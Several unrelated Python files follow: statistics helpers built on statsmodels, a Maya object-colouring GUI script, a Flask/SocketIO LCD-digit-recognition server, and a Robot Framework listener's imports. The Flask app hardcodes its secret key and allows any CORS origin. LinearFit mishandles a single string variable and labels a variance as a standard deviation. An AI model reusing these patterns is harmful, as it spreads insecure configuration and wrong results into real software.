predicted_on_random_only = pd.merge(df_random_effect_inputs, df_random_effect_values,
left_on=self.group_var,
right_index=True, how='left',
sort=False)['Group'] # was 'GroupValue'
total_prediction = predicted_on_fixed_only + predicted_on_random_only
else:
total_prediction = predicted_on_fixed_only
return total_prediction
class LinearFit:
""" Object: holds info for one ordinary multivariate least squares fit. TESTS OK 2020-10-25.
Generic in nature--not tied to astronomical usage.
Internally uses column-name API to statsmodels OLS.
Usage: fit = LinearFit(df_input, 'Y', ['X1', 'X2']]
fit = LinearFit(df_input, 'Y', 'X1'] (OK if only one indep var)
Fields available from LinearFit object:
.indep_vars: names of independent variables. [list of strings]
.dep_var: name of dependent variable. [string]
.nobs: count of observations. [int]
.sigma: std deviation of residuals over all observations [float]
.statsmodels_object: embedded RegressionResults object from statsmodels.
(needed for predictions using .predict(); not too directly useful to user
.df_indep_vars, one row per intercept & independent variables. [pandas Dataframe]
columns:
(index): 'Intercept' or name of fixed effect (independent variable)
Name: same as (index)
Value: best value (coefficient) of indep variable from fit
Stdev: std deviation of Value from fit
Tvalue: Value / Stdev from fit
Pvalue: [ignore]
.df_observations, one row per observation used in fit:
columns:
(index): [int]
FittedValue: value predicted from fit for observation
Residual: obs value - fitted value for observation
"""
def __init__(self, data, dep_var=None, indep_vars=None):
""" Executes ordinary least-squares multivariate linear fit, makes data available.
:param data: input data, one variable per column, one point per row. [pandas Dataframe]
:param dep_var: one column name as dependent 'Y' variable. [string]
:param indep_vars: one or more column names as independent 'X' variable. [string or
list of strings]
"""
if not isinstance(data, pd.DataFrame):
print('Parameter \'data\' must be a pandas Dataframe of input data.')
return
if dep_var is None or indep_vars is None:
print('Provide parameters: dep_var and indep_vars.')
return
if not isinstance(dep_var, str):
print('Parameter \'dep_var\' must be a string.')
return
indep_vars_valid = False # default if not validated
if isinstance(indep_vars, str):
indep_vars = list(indep_vars)
indep_vars_valid = True
if isinstance(indep_vars, list):
if len(indep_vars) >= 1:
if all([isinstance(var, str) for var in indep_vars]):
indep_vars_valid = True
if not indep_vars_valid:
print('Parameter \'indep_vars\' must be a string or a list of strings.')
return
# Build inputs to regression fn and run it:
y = data[dep_var]
x = data[indep_vars].copy()
x = sm_api.add_constant(x)
model = sm_api.OLS(endog=y, exog=x)
fit = model.fit()
self.statsmodels_object = fit
# Scalar and naming attributes:
self.indep_vars = indep_vars # as passed in
self.dep_var = dep_var # as passed in
self.nobs = fit.nobs
self.sigma = fit.mse_resid
self.r2 = fit.rsquared_adj
# Make solution (indep vars) dataframe:
df = pd.DataFrame({'Value': fit.params})
df = df.join(pd.DataFrame({'Stdev': fit.bse})) # use join to enforce consistency
df = df.join(pd.DataFrame({'Tvalue': fit.tvalues})) # "
df = df.join(pd.DataFrame({'PValue': fit.pvalues})) # "
df.index = ['Intercept' if x.lower() == 'const' else x for x in df.index]
df['Name'] = df.index
self.df_indep_vars = df.copy()
# Make observation dataframe (rows in same order as in input dataframe):
df = pd.DataFrame({'FittedValue': fit.fittedvalues})
df['Residual'] = fit.resid
self.df_observations = df.copy()
def predict(self, df_predict_input):
indep_var_inputs = df_predict_input[self.indep_vars] # 1 column per independent (x) variable
predicted_y_values = self.statsmodels_object.predict(exog=indep_var_inputs)
return predicted_y_values
_____STATISTICAL_FUNCTIONS__________________________________ = 0
def weighted_mean(values, weights):
""" Returns weighted mean, weighted std deviation of values, and weighted std deviation of the mean.
TESTS OK 2020-10-25.
:param values: list (or other iterable) of values to be averaged
:param weights: list (or other iterable) of weights; length must = length of values
:return: 3-tuple (weighted mean, weighted std dev (population), weighted std dev of mean)
"""
if (len(values) != len(weights)) or (len(values) == 0) or (len(weights) == 0):
raise ValueError('lengths of values & weights must be equal & non-zero.')
if sum(weights) <= 0:
raise ValueError('sum of weights must be positive.')
value_list = list(values) # py list comprehension often misunderstands pandas Series indices.
weight_list = list(weights) # "
norm_weights = [wt/sum(weights) for wt in weight_list]
w_mean = sum([nwt * val for (nwt, val) in zip(norm_weights, value_list)])
n_nonzero_weights = sum([w != 0 for w in weight_list])
if n_nonzero_weights == 1:
w_stdev_pop = 0
w_stdev_w_mean = 0
else:
resid2 = [(val-w_mean)**2 for val in value_list]
nwt2 = sum([nwt**2 for nwt in norm_weights])
rel_factor = 1.0 / (1.0 - nwt2) # reliability factor (better than N'/(N'-1))
w_stdev_pop = sqrt(rel_factor * sum([nwt * r2 for (nwt, r2) in zip(norm_weights, resid2)]))
w_stdev_w_mean = sqrt(nwt2) * w_stdev_pop
return w_mean, w_stdev_pop, w_stdev_w_mean |
<reponame>TrevisanGMW/maya<gh_stars>10-100
"""
GT Color Manager - A script for managing the color of many objects at the same time (outliner and other overrides)
@<NAME> - <EMAIL> - 2020-11-13
https://github.com/TrevisanGMW
1.1 - 2020-11-16
Fixed an issue where the color containing rendering space data would be applied to the outliner.
1.2 - 2020-11-23
Fixed an issue with the persistent settings not being updated when importing the script.
1.3 - 2020-12-03
Fixed an issue where shape nodes wouldn't reset properly
1.4 - 2021-05-11
Made script compatible with Python 3 (Maya 2022+)
"""
import maya.cmds as cmds
import random
import math
import copy
import sys
from maya import OpenMayaUI as omui
try:
from shiboken2 import wrapInstance
except ImportError:
from shiboken import wrapInstance
try:
from PySide2.QtGui import QIcon
from PySide2.QtWidgets import QWidget
except ImportError:
from PySide.QtGui import QIcon, QWidget
# Script Name
script_name = "GT Color Manager"
# Version
script_version = "1.4";
# Python Version
python_version = sys.version_info.major
gt_color_manager_settings = { 'current_color': [.3,.3,.3],
'default_mode' : 'Drawing Override',
'default_target' : 'Transform',
'default_set_outliner' : True,
'default_set_viewport' : False}
# Store Default Values for Reseting
gt_color_manager_settings_default_values = copy.deepcopy(gt_color_manager_settings)
def get_persistent_settings_color_manager():
'''
Checks if persistant settings for GT Color Manager exists and transfer them to the settings variables.
It assumes that persistent settings were stored using the cmds.optionVar function.
'''
set_outliner_exists = cmds.optionVar(exists=("gt_color_manager_set_outliner"))
set_viewport_exists = cmds.optionVar(exists=("gt_color_manager_set_viewport"))
set_current_color_exists = cmds.optionVar(exists=("gt_color_manager_current_color"))
set_target_exists = cmds.optionVar(exists=("gt_color_manager_target"))
set_mode_exists = cmds.optionVar(exists=("gt_color_manager_mode"))
if set_outliner_exists:
gt_color_manager_settings['default_set_outliner'] = int(cmds.optionVar(q=("gt_color_manager_set_outliner")))
if set_viewport_exists:
gt_color_manager_settings['default_set_viewport'] = int(cmds.optionVar(q=("gt_color_manager_set_viewport")))
if set_current_color_exists:
try:
color_str_list = cmds.optionVar(q=("gt_color_manager_current_color")).replace('[','').replace(']','').split(',')
gt_color_manager_settings['current_color'] = [float(color_str_list[0]), float(color_str_list[1]), float(color_str_list[2])]
except:
pass
if set_target_exists:
gt_color_manager_settings['default_target'] = str(cmds.optionVar(q=("gt_color_manager_target")))
if set_mode_exists:
gt_color_manager_settings['default_mode'] = str(cmds.optionVar(q=("gt_color_manager_mode")))
def set_persistent_settings_color_manager(option_var_name, option_var_string):
'''
Stores persistant settings for GT Color Manager.
It assumes that persistent settings are using the cmds.optionVar function.
Parameters:
option_var_name (string): name of the optionVar string. Must start with script name + name of the variable
option_var_string (string): string to be stored under the option_var_name
'''
if option_var_string != '' and option_var_name != '':
cmds.optionVar( sv=(str(option_var_name), str(option_var_string)))
def reset_persistent_settings_color_manager():
''' Resets persistant settings for GT Renamer '''
cmds.optionVar( remove='gt_color_manager_set_outliner' )
cmds.optionVar( remove='gt_color_manager_set_viewport' )
cmds.optionVar( remove='gt_color_manager_current_color' )
cmds.optionVar( remove='gt_color_manager_target' )
cmds.optionVar( remove='gt_color_manager_mode' )
for def_value in gt_color_manager_settings_default_values:
for value in gt_color_manager_settings:
if def_value == value:
gt_color_manager_settings[value] = gt_color_manager_settings_default_values[def_value]
get_persistent_settings_color_manager()
build_gui_color_manager()
cmds.warning('Persistent settings for ' + script_name + ' were cleared.')
# Main Form ============================================================================
def build_gui_color_manager():
''' Builds Main UI '''
window_name = "build_gui_color_manager"
if cmds.window(window_name, exists =True):
cmds.deleteUI(window_name)
# Main GUI Start Here =================================================================================
# Build UI
build_gui_color_manager = cmds.window(window_name, title=script_name + ' (v' + script_version + ')',\
titleBar=True, mnb=False, mxb=False, sizeable =True)
cmds.window(window_name, e=True, s=True, wh=[1,1])
content_main = cmds.columnLayout(adj = True)
# Title Text
title_bgc_color = (.4, .4, .4)
cmds.separator(h=10, style='none') # Empty Space
cmds.rowColumnLayout(nc=1, cw=[(1, 330)], cs=[(1, 10)], p=content_main) # Window Size Adjustment
cmds.rowColumnLayout(nc=3, cw=[(1, 10), (2, 260), (3, 50)], cs=[(1, 10), (2, 0), (3, 0)], p=content_main) # Title Column
cmds.text(" ", bgc=title_bgc_color) # Tiny Empty Green Space
cmds.text(script_name, bgc=title_bgc_color, fn="boldLabelFont", align="left")
cmds.button( l ="Help", bgc=title_bgc_color, c=lambda x:build_gui_help_color_manager())
cmds.separator(h=3, style='none', p=content_main) # Empty Space
# Body ====================
body_column = cmds.rowColumnLayout(nc=1, cw=[(1, 320)], cs=[(1,10)], p=content_main)
cmds.rowColumnLayout(nc=1, cw=[(1, 300)], cs=[(1,10)])
cmds.separator(h=20, p=body_column)
mid_container = cmds.rowColumnLayout(p=body_column, h= 25,nc=2, cw=[(1, 160)], cs=[(1,5),(2,15)])
mode_option = cmds.optionMenu(label='Mode', cc=lambda x:set_persistent_settings_color_manager('gt_color_manager_mode', cmds.optionMenu(mode_option, q=True, value=True)))
cmds.menuItem( label='Drawing Override' )
cmds.menuItem( label='Wireframe Color' )
if gt_color_manager_settings.get('default_mode') == 'Drawing Override':
cmds.optionMenu(mode_option, e=True, select=1) # 1-based selection
else:
cmds.optionMenu(mode_option, e=True, select=2) # 1-based selection
target_option = cmds.optionMenu(label='Target', cc=lambda x:set_persistent_settings_color_manager('gt_color_manager_target', cmds.optionMenu(target_option, q=True, value=True)))
cmds.menuItem( label='Transform' )
cmds.menuItem( label='Shape' )
if gt_color_manager_settings.get('default_target') == 'Transform':
cmds.optionMenu(target_option, e=True, select=1) # 1-based selection
else:
cmds.optionMenu(target_option, e=True, select=2) # 1-based selection
# Main Color Picker
cmds.separator(h=10, style='none', p=body_column) # Empty Space
color_container = cmds.rowColumnLayout(p=body_column, nc=1, h= 25, cw=[(1,310)], cs=[(1,5)])
color_slider = cmds.colorSliderGrp(label='Current Color ', rgb=(gt_color_manager_settings.get("current_color")[0], \
gt_color_manager_settings.get("current_color")[1],\
gt_color_manager_settings.get("current_color")[2]),\
cal=[1,'left'],
columnWidth=((1,80),(3,130)), cc=lambda x:update_stored_values())
cmds.separator(h=7, style='none', p=body_column) # Empty Space
c_btn_w = 30
c_btn_s = 1
cmds.rowColumnLayout(nc=10, cw=[(1,c_btn_w),(2,c_btn_w),(3,c_btn_w),(4,c_btn_w),(5,c_btn_w),(6,c_btn_w),(7,c_btn_w),(8,c_btn_w),(9,c_btn_w),(10,c_btn_w)],\
cs=[(1,5),(2,c_btn_s),(3,c_btn_s),(4,c_btn_s),(5,c_btn_s),(6,c_btn_s),(7,c_btn_s),(8,c_btn_s),(9,c_btn_s),(10,c_btn_s)], p=body_column)
color_buttons_height = 20
# Rainbow
c_btn_01 = [1,.25,.25] # Red
c_btn_02 = [1,.45,.15] # Orange
c_btn_03 = [1,1,.35] # Yellow
c_btn_04 = [.5,1,.20] # Green
c_btn_05 = [.3,1,.8] # Cyan
c_btn_06 = [.2,0.6,1] # Soft Blue
c_btn_07 = [0,.2,1] # Blue
c_btn_08 = [1,.45,.70] # Pink
c_btn_09 = [.75,.35,.90] # Soft Purple
c_btn_10 = [.45,0.2,0.9] # Purple
cmds.button(l='', bgc=c_btn_01, h=color_buttons_height, c=lambda x:apply_preset(c_btn_01))
cmds.button(l='', bgc=c_btn_02, h=color_buttons_height, c=lambda x:apply_preset(c_btn_02))
cmds.button(l='', bgc=c_btn_03, h=color_buttons_height, c=lambda x:apply_preset(c_btn_03))
cmds.button(l='', bgc=c_btn_04, h=color_buttons_height, c=lambda x:apply_preset(c_btn_04))
cmds.button(l='', bgc=c_btn_05, h=color_buttons_height, c=lambda x:apply_preset(c_btn_05))
cmds.button(l='', bgc=c_btn_06, h=color_buttons_height, c=lambda x:apply_preset(c_btn_06))
cmds.button(l='', bgc=c_btn_07, h=color_buttons_height, c=lambda x:apply_preset(c_btn_07))
cmds.button(l='', bgc=c_btn_08, h=color_buttons_height, c=lambda x:apply_preset(c_btn_08))
cmds.button(l='', bgc=c_btn_09, h=color_buttons_height, c=lambda x:apply_preset(c_btn_09))
cmds.button(l='', bgc=c_btn_10, h=color_buttons_height, c=lambda x:apply_preset(c_btn_10))
cmds.separator(h=7, style='none', p=body_column) # Empty Space
cmds.separator(h=15, p=body_column)
bottom_container = cmds.rowColumnLayout(p=body_column,adj=True)
checkbox_column = cmds.rowColumnLayout(p=bottom_container,nc=3, cw=[(1, 80),(2, 100),(3, 100)], cs=[(1,0),(2,60)],nbg=True)
cmds.text('Set Color For')
outliner_chk = cmds.checkBox(label='Outliner', p=checkbox_column, nbg=False, value=gt_color_manager_settings.get('default_set_outliner'),\
cc=lambda x:set_persistent_settings_color_manager('gt_color_manager_set_outliner',\
str(int(cmds.checkBox(outliner_chk, q=True, value=True)))))
viewport_chk = cmds.checkBox(label='Viewport', p=checkbox_column, value=gt_color_manager_settings.get('default_set_viewport'),\
cc=lambda x:set_persistent_settings_color_manager('gt_color_manager_set_viewport',\
str(int(cmds.checkBox(viewport_chk, q=True, value=True)))))
cmds.separator(h=10, style='none', p=bottom_container) # Empty Space
cmds.button(l ="Reset", c=lambda x:set_color(reset=True), p=bottom_container) # Empty Space
cmds.separator(h=5, style='none', p=bottom_container)
cmds.button(l ="Apply", bgc=(.6, .6, .6), c=lambda x:set_color(), p=bottom_container)
cmds.separator(h=10, style='none', p=bottom_container) # Empty Space
def update_stored_values():
''' Updates Current Color '''
gt_color_manager_settings["current_color"] = cmds.colorSliderGrp(color_slider, q=True, rgb=True) # for outliner?
set_persistent_settings_color_manager('gt_color_manager_current_color', cmds.colorSliderGrp(color_slider, q=True, rgb=True))
def apply_preset(rgb_color):
'''
Updates current color with the provided input then runs main function.
Parameters:
rgb_color (list): a list of three floats describing an RGB Color (e.g. [1,0,0] for Red)
'''
managed_r = math.pow((rgb_color[0] + 0.055) / 1.055, 2.4)
managed_g = math.pow((rgb_color[1] + 0.055) / 1.055, 2.4)
managed_b = math.pow((rgb_color[2] + 0.055) / 1.055, 2.4)
cmds.colorSliderGrp(color_slider, e=True, rgb= (managed_r,managed_g,managed_b))
update_stored_values()
set_color()
def set_color(reset=False):
''''
Uses the provided settings to manage colors (Main function of this script)
Parameter:
reset (bool): Type of operation. Reset active will restore default colors.
'''
errors = ''
try:
function_name = 'GT Color Manager - Set Color'
cmds.undoInfo(openChunk=True, chunkName=function_name)
valid_selection = True
objects_to_color = []
colored_total = 0
# Grab Necessary Values
mode = cmds.optionMenu(mode_option, q=True, value=True)
target = cmds.optionMenu(target_option, q=True, value=True)
color = gt_color_manager_settings.get('current_color')
set_outliner = cmds.checkBox(outliner_chk, q=True, value=True)
set_viewport = cmds.checkBox(viewport_chk, q=True, value=True)
# Functions
def set_color_drawing_override(obj_to_set):
'''
Uses drawing override settings to set the color of an object
Parameters:
obj_to_set (str): Name (path) of the object to affect.
'''
using_wireframe = cmds.getAttr(obj_to_set + '.useObjectColor')
if using_wireframe != 0:
cmds.color( obj_to_set )
cmds.setAttr(obj_to_set + '.overrideEnabled', 1)
cmds.setAttr(obj_to_set + '.overrideRGBColors', 1)
cmds.setAttr(obj_to_set + '.overrideColorR', color[0])
cmds.setAttr(obj_to_set + '.overrideColorG', color[1])
cmds.setAttr(obj_to_set + '.overrideColorB', color[2])
return 1
def set_color_wireframe_tool(obj_to_set):
'''
Uses wireframe color to set the color of an object
Parameters:
obj_to_set (str): Name (path) of the object to affect.
'''
using_override = cmds.getAttr(obj_to_set + '.overrideEnabled')
if using_override:
cmds.setAttr(obj_to_set + '.overrideEnabled', 0)
cmds.setAttr(obj_to_set + '.overrideColorR', 0)
cmds.setAttr(obj_to_set + '.overrideColorG', 0)
cmds.setAttr(obj_to_set + '.overrideColorB', 0)
cmds.color( obj_to_set, rgb=(color[0], color[1], color[2]) )
return 1
def set_color_outliner(obj_to_set):
'''
Sets the outliner color for the selected object
Parameters:
obj_to_set (str): Name (path) of the object to affect.
'''
extrated_r = math.pow(color[0], 0.454)
extrated_g = math.pow(color[1], 0.454)
extrated_b = math.pow(color[2], 0.454)
cmds.setAttr(obj_to_set + '.useOutlinerColor', 1)
cmds.setAttr(obj_to_set + '.outlinerColorR', extrated_r)
cmds.setAttr(obj_to_set + '.outlinerColorG', extrated_g)
cmds.setAttr(obj_to_set + '.outlinerColorB', extrated_b)
return 1
def set_color_reset(obj_to_set, reset_overrides=False, reset_wireframe=False, reset_outliner=False):
''' Resets the color of the selected objects
Parameters:
obj_to_set (str): Name (path) of the object to affect.
reset_overrides (bool) : Reseting Overrides
reset_wireframe (bool) : Reseting Wireframe
reset_outliner (bool) : Reseting Outliner
'''
if reset_overrides:
using_override = cmds.getAttr(obj_to_set + '.overrideEnabled')
if using_override:
cmds.setAttr(obj_to_set + '.overrideEnabled', 0)
cmds.setAttr(obj_to_set + '.overrideColorR', 0)
cmds.setAttr(obj_to_set + '.overrideColorG', 0)
cmds.setAttr(obj_to_set + '.overrideColorB', 0)
if reset_wireframe:
using_wireframe = cmds.getAttr(obj_to_set + '.useObjectColor')
if using_wireframe != 0:
cmds.color( obj_to_set )
if reset_outliner:
try:
cmds.setAttr(obj_to_set + '.useOutlinerColor', 0)
except:
pass
return 1
selection = cmds.ls(selection=True)
if len(selection) < 1:
valid_selection = False
cmds.warning('You need to select at least one object.')
if valid_selection:
# Determine what to color
if target == 'Transform':
objects_to_color = selection
else:
for sel in selection:
shapes = cmds.listRelatives(sel, shapes=True, fullPath=True) or []
for shape in shapes:
objects_to_color.append(shape)
# Determine total of objects to be colored
if len(objects_to_color) < 1:
valid_selection = False
cmds.warning('No shapes were found. Make sure you\'re using the correct "Target" option.')
# Set Color
if valid_selection and reset == False:
for obj in objects_to_color:
if set_viewport:
try:
if mode == 'Drawing Override':
colored_total += set_color_drawing_override(obj)
else:
colored_total += set_color_wireframe_tool(obj)
except Exception as e:
errors += str(e) + '\n'
if set_outliner:
try:
if set_viewport:
set_color_outliner(obj)
else:
colored_total += set_color_outliner(obj)
except Exception as e:
errors += str(e) + '\n'
if valid_selection and reset == True:
for obj in objects_to_color:
if set_viewport:
try:
colored_total += set_color_reset(obj, reset_overrides=True, reset_wireframe=True)
except Exception as e:
errors += str(e) + '\n'
if set_outliner:
try:
if set_viewport:
set_color_reset(obj, reset_outliner=True)
else:
colored_total += set_color_reset(obj, reset_outliner=True)
except Exception as e:
errors += str(e) + '\n'
# Create message
message = '<' + str(random.random()) + '><span style=\"color:#FF0000;text-decoration:underline;\">' + str(colored_total) + ' </span>'
is_plural = 'objects were'
if colored_total == 1:
is_plural = 'object was'
if reset:
message += is_plural + ' reset to the default color.'
else:
message += is_plural + ' colored.'
cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)
except Exception as e:
errors += str(e) + '\n'
finally:
cmds.undoInfo(closeChunk=True, chunkName=function_name)
if errors != '':
cmds.warning('An error occured. Open the script editor for more information.')
print('######## Errors: ########')
print(errors)
# Show and Lock Window
cmds.showWindow(build_gui_color_manager)
cmds.window(window_name, e=True, s=False)
# Set Window Icon
qw = omui.MQtUtil.findWindow(window_name)
if python_version == 3:
widget = wrapInstance(int(qw), QWidget)
else:
widget = wrapInstance(long(qw), QWidget)
icon = QIcon(':/render_swColorPerVertex.png')
widget.setWindowIcon(icon)
# Main GUI Ends Here =================================================================================
# Creates Help GUI
def build_gui_help_color_manager():
window_name = "build_gui_help_color_manager"
if cmds.window(window_name, exists=True):
cmds.deleteUI(window_name, window=True)
cmds.window(window_name, title= script_name + " Help", mnb=False, mxb=False, s=True)
cmds.window(window_name, e=True, s=True, wh=[1,1])
cmds.columnLayout("main_column", p= window_name)
# Title Text
title_bgc_color = (.4, .4, .4)
cmds.separator(h=12, style='none') # Empty Space
cmds.rowColumnLayout(nc=1, cw=[(1, 310)], cs=[(1, 10)], p="main_column") # Window Size Adjustment
cmds.rowColumnLayout(nc=1, cw=[(1, 300)], cs=[(1, 10)], p="main_column") # Title Column
cmds.text(script_name + " Help", bgc=title_bgc_color, fn="boldLabelFont", align="center")
cmds.separator(h=10, style='none', p="main_column") # Empty Space
# Body ====================
cmds.rowColumnLayout(nc=1, cw=[(1, 300)], cs=[(1,10)], p="main_column")
cmds.text(l='Script for quickly coloring elements in Maya', align="center")
cmds.separator(h=15, style='none') # Empty Space
cmds.text(l='Modes:', align="center", fn="tinyBoldLabelFont")
cmds.text(l='- Drawing Override:\n Utilize "Object > Object Display > Drawing Overrides" to set color', align="center", font='smallPlainLabelFont')
cmds.text(l='- Wireframe Color:\n Utilize "Display > Wireframe Color..." to set color', align="center", font='smallPlainLabelFont')
cmds.separator(h=10, style='none') # Empty Space
cmds.text(l='Target:', align="center", fn="tinyBoldLabelFont")
cmds.text(l='- Transform:\n Colorize actual selection. Usually a "transform"', align="center", font='smallPlainLabelFont')
cmds.text(l='- Wireframe Color:\n Colorize the shape node inside the transform', align="center", font='smallPlainLabelFont')
cmds.separator(h=10, style='none') # Empty Space
cmds.text(l='Current Color:', align="center", fn="tinyBoldLabelFont")
cmds.text(l='The color used in the operation', font='smallPlainLabelFont')
cmds.separator(h=10, style='none') # Empty Space
cmds.text(l='Color Presets:', align="center", fn="tinyBoldLabelFont")
cmds.text(l='A list of common colors. When clicking it sets the color', font='smallPlainLabelFont')
cmds.separator(h=10, style='none') # Empty Space
cmds.text(l='Set Color For:', align="center", fn="tinyBoldLabelFont")
cmds.text(l='- Outliner:\n Control the outliner color', align="center", font='smallPlainLabelFont')
cmds.text(l='- Wireframe Color:\n Control the wireframe color seen in the viewport', align="center", font='smallPlainLabelFont')
cmds.separator(h=15, style='none') # Empty Space
cmds.rowColumnLayout(nc=2, cw=[(1, 140),(2, 140)], cs=[(1,10),(2, 0)], p="main_column")
cmds.text('<NAME> ')
cmds.text(l='<a href="mailto:<EMAIL>"><EMAIL></a>', hl=True, highlightColor=[1,1,1])
cmds.rowColumnLayout(nc=2, cw=[(1, 140),(2, 140)], cs=[(1,10),(2, 0)], p="main_column")
cmds.separator(h=15, style='none') # Empty Space
cmds.text(l='<a href="https://github.com/TrevisanGMW">Github</a>', hl=True, highlightColor=[1,1,1])
cmds.separator(h=7, style='none') # Empty Space
# Close Button
cmds.rowColumnLayout(nc=1, cw=[(1, 300)], cs=[(1,10)], p="main_column")
cmds.separator(h=10, style='none')
cmds.button(l='Reset Persistent Settings', h=30, c=lambda args: reset_persistent_settings_color_manager())
cmds.separator(h=5, style='none')
cmds.button(l='OK', h=30, c=lambda args: close_help_gui())
cmds.separator(h=8, style='none')
# Show and Lock Window
cmds.showWindow(window_name)
cmds.window(window_name, e=True, s=False)
# Set Window Icon
qw = omui.MQtUtil.findWindow(window_name)
if python_version == 3:
widget = wrapInstance(int(qw), QWidget)
else:
widget = wrapInstance(long(qw), QWidget)
icon = QIcon(':/question.png')
widget.setWindowIcon(icon)
def close_help_gui():
if cmds.window(window_name, exists=True):
cmds.deleteUI(window_name, window=True)
# Build Main Dialog
get_persistent_settings_color_manager()
if __name__ == '__main__':
build_gui_color_manager() |
<filename>lcd_digit_recognizer/web/app.py
import base64
import gc
import json
import os
import threading
import time
import traceback
from multiprocessing import freeze_support
from pympler import muppy, summary
import eventlet
eventlet.monkey_patch()
import numpy as np
import cv2
from flask import Flask, render_template, make_response, request
from flask_bootstrap import Bootstrap
from flask_socketio import SocketIO, send, emit, join_room
from lcd_digit_recognizer.web.recognition_service import RecognitionService
this_file_dir_path = os.path.dirname(os.path.realpath(__file__))
HTTP_PORT = 7894
HISTORY_DIR = "/tmp/cupr_history"
MAX_HISTORY_LENGTH = 1000
# run env initialization
RECOGNITION_SERVICE = None # will be initialized later (due to process forking interference with flask)
os.makedirs(HISTORY_DIR, exist_ok=True)
# prepare server
app = Flask(__name__)
app.secret_key = b'effer234\n\xec]/'
Bootstrap(app)
socketio = SocketIO(app, cors_allowed_origins="*", async_mode="eventlet")
@app.route("/nocamera")
def nocamera():
return render_template("nocamera.html")
@app.route("/static/<static_file>.css")
def dynamic_css(static_file):
path = os.path.join(this_file_dir_path, f"static/{static_file}.css")
with open(path) as f:
r = make_response(f.read())
r.headers["Content-type"] = "text/css"
return r
@app.route("/static/<static_file>.js")
def dynamic_js(static_file):
path = os.path.join(this_file_dir_path, f"static/{static_file}.js")
with open(path) as f:
r = make_response(f.read())
r.headers["Content-type"] = "text/javascript"
return r
@app.route("/")
def index():
return render_template("index.html")
@app.route("/camera_debug")
def camera_debug():
return render_template("camera_debug.html")
@app.route("/history_filler")
def history_filler():
return render_template("history_filler.html")
@app.route("/history")
def image_history():
return render_template("history.html")
@app.route("/dashboard")
def dashboard():
return render_template("dashboard.html")
@app.route("/recognition_history")
def recognition_history():
result = []
for file_name in os.listdir(HISTORY_DIR):
if file_name.endswith(".rcg"):
result.append(file_name[:-4])
result.sort()
result.reverse()
return render_template("recognition_history.html", ids=result)
@app.route("/show_image/<id>")
def show_image(id):
with open(f"{HISTORY_DIR}/{id}.png", "br") as f:
image_binary = f.read()
response = make_response(image_binary)
response.headers.set("Content-Type", "image/png")
return response
@app.route("/show_recognition_json/<id>")
def show_recognition_json(id):
try:
with open(f"{HISTORY_DIR}/{id}.rcg", "r") as f:
recognition_json = f.read()
except Exception:
return json.dumps({
"exception": traceback.format_exc()
})
response = make_response(recognition_json)
response.headers.set("Content-Type", "application/json")
return response
@app.route("/show_recognition/<id>")
def show_recognition(id):
with open(f"{HISTORY_DIR}/{id}.rcg", "r") as f:
recognized_number = f.read()
return render_template("show_recognition.html", recognized_number=recognized_number, id=id)
@socketio.on("clear_history")
def handle_clear_history(message):
sid = request.sid
RECOGNITION_SERVICE.close_context(sid)
@socketio.on("frame")
def handle_frame(message):
try:
sid = request.sid
image_bytes = base64.b64decode(message["image"])
input_id = message.get("input_id", None)
timestamp = time.time()
server_image_id = str(timestamp)
nparr = np.fromstring(image_bytes, np.uint8)
img_np = cv2.imdecode(nparr, cv2.IMREAD_COLOR)
if img_np is None or len(img_np) == 0:
raise AssertionError("Image could not be load correctly (probably incorrect format)")
RECOGNITION_SERVICE.add_job(sid, server_image_id, img_np, input_id)
output_path = f"{HISTORY_DIR}/{server_image_id}.png"
cv2.imwrite(output_path, img_np)
emit("frame_result", {
"code": "ok",
"input_id": input_id,
"server_image_id": server_image_id,
"sid": sid,
})
except Exception as e:
emit("frame_result", {
"code": "failed",
"error": str(e),
"input": message
})
@socketio.on('connect')
def handle_connect():
print('Client connected ' + request.sid)
@socketio.on('disconnect')
def handle_disconnect():
sid = request.sid
print('Client disconnected ' + sid)
RECOGNITION_SERVICE.close_context(sid)
@app.route("/.well-known/acme-challenge/<name>")
def cert(name):
if "/" in name:
# prevent file leaks
return "Invalid path"
with open(f"/tmp/.well-known/acme-challenge/{name}") as f:
return f.read()
def report_recognition(sid, image_id, result):
with open(os.path.join(HISTORY_DIR, image_id + ".rcg"), "w") as f:
f.write(str(result))
socketio.emit("recognition_result", result, room=sid)
def run_history_cleaner():
gc.collect()
all_objects = muppy.get_objects()
sum1 = summary.summarize(all_objects)
# Prints out a summary of the large objects
summary.print_(sum1)
remove_files(".png")
remove_files(".rcg")
threading.Timer(60, run_history_cleaner).start()
def remove_files(extension):
file_paths = []
for name in os.listdir(HISTORY_DIR):
if not name.endswith(extension):
continue
file_paths.append(os.path.join(HISTORY_DIR, name))
file_paths.sort()
while len(file_paths) > MAX_HISTORY_LENGTH:
path_to_delete = file_paths.pop(0)
os.unlink(path_to_delete)
@app.after_request
def add_header(response):
# response.cache_control.no_store = True
if 'Cache-Control' not in response.headers:
response.headers['Cache-Control'] = 'no-store'
return response
def print_banner(http_port):
print("Today's menu:")
print()
print(" http://localhost:{}/".format(str(http_port)))
print(" http://localhost:{}/camera_debug".format(str(http_port)))
print(" http://localhost:{}/nocamera".format(str(http_port)))
print(" http://localhost:{}/history".format(str(http_port)))
print(" http://localhost:{}/history_filler".format(str(http_port)))
print(" http://localhost:{}/recognition_history".format(str(http_port)))
print("")
if __name__ == "__main__":
freeze_support()
run_history_cleaner()
if "DEBUG_MODE" in os.environ:
use_reloader = True
debug = True
start_recognition = False
else:
use_reloader = False
debug = False
start_recognition = True
RECOGNITION_SERVICE = RecognitionService(recognition_callback=report_recognition)
if start_recognition:
RECOGNITION_SERVICE.start()
print_banner(HTTP_PORT)
socketio.run(app, host='0.0.0.0', port=HTTP_PORT, use_reloader=use_reloader, debug=debug)
|
import collections
from contextlib import contextmanager
from functools import wraps
import io
from itertools import cycle
import logging
import os
import pprint
import re
import shutil
import socket
import subprocess
from sys import version, stderr
import sys
import threading
import time
import uuid
from warnings import catch_warnings
import webbrowser
from allure.common import AttachmentType
from allure.constants import Status, Label
from allure.structure import Environment, EnvParameter, TestLabel, Failure, Attach, TestSuite, TestStep
from allure.utils import now
import jprops
from lxml import etree
from oauthlib.uri_validate import path
import py
from robot.api import logger
from robot.libraries.BuiltIn import BuiltIn
from robot.libraries.Process import Process
from robot.libraries.Screenshot import Screenshot
from robot.running.userkeyword import UserLibrary
from robot.version import get_version, get_full_version, get_interpreter
from six import text_type, iteritems
from sqlalchemy.sql.expression import false
from common import AllureImpl
from constants import Robot, ROBOT_OUTPUT_FILES, SEVERITIES, STATUSSES
from structure import AllureProperties, TestCase # Overriding TestCase due to missing severity attribute.
from util_funcs import clear_directory, copy_dir_contents
from version import VERSION
